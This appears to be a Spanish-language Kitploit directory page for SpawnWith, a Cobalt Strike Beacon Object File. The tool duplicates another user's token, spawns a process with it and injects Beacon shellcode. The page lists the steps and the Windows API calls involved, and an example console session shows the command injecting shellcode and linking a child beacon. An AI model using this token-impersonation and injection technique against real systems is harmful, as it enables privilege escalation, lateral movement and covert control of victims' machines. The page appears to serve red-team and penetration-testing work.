Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SpawnWith — BOF de Cobalt Strike que crea un proceso utilizando el token de otro usuario e inyecta shellcode de Beacon, lo que permite post-explotación y movimiento lateral mediante suplantación de identidad. | Kitploit
Herramientas/GitHubGitHub/rasta-mouse/spawnwith
Escalada de PrivilegiosHerramientas de SuplantaciónMovimiento LateralPost-ExplotaciónComando y Control
GitHubrasta-mouse/spawnwith

SpawnWith

BOF de Cobalt Strike que crea un proceso utilizando el token de otro usuario e inyecta shellcode de Beacon, lo que permite post-explotación y movimiento lateral mediante suplantación de identidad.

Ver Repositorio
11217hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SpawnWith

Un Beacon Object File (BOF) experimental que ofrece una alternativa a los comandos spawnas e inject. Este expone un nuevo comando, spawn_with [pid] [listener], que realiza lo siguiente:

  1. Obtener un handle al proceso de destino.
  2. Obtener un handle al token principal del proceso.
  3. Duplicar el token principal en un token de suplantación.
  4. Obtener el valor spawnto del Beacon.
  5. Intentar generar un nuevo proceso con el token duplicado usando CreateProcessWithTokenW.
    • Si este intento falla, probar con CreateProcessAsUserW.
  6. Inyectar el shellcode del Beacon en el proceso generado.
    • Enlazar con el Beacon en caso de P2P.

Ejemplo

root@kitploit:~
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

Descargar herramienta